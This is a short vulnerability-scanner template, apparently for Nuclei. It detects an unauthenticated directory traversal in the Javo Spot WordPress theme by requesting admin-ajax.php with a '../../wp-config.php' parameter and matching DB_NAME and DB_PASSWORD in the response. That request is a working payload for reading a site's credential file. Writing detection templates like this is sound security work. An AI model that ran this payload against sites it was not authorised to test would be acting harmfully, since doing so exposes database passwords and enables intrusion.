id: wp-javospot-premium-theme-lfi

info:
  name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
  author: 0x_Akoko
  severity: high
  tags: wordpress,wp-theme,lfi,wp
  reference: https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php? jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
